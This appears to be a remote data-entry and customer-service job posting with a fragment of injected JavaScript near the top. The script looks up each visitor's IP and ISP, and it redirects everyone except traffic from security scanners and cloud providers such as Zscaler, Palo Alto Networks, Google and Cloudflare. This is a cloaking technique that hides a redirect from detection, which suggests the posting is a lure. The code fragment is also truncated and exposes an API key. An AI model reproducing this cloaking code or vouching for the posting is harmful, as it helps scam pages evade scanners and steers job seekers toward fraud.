Remote Data Entry Clerk – Customer Service
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a detail-oriented Data Entry Clerk - Work at Home Remote - Customer Service Representative to join our team in St. Petersburg, Florida. This role involves accurately inputting and managing data, providing exceptional customer service, and supporting various administrative tasks remotely.
Responsibilities include:
- Entering and updating data into company systems with precision
- Responding to customer inquiries via phone, email, or chat in a professional manner
- Verifying data accuracy and resolving discrepancies
- Assisting with basic administrative and clerical tasks
- Maintaining confidentiality of sensitive information
Skills needed:
- Excellent communication and interpersonal skills
- Strong attention to detail and organizational abilities
- Proficiency with computers and data management software
- Self-motivated and able to work independently
- Reliable high-speed internet connection
Benefits include:
- Flexible remote work environment
- Competitive pay
- Opportunity for growth and development
- Supportive team atmosphere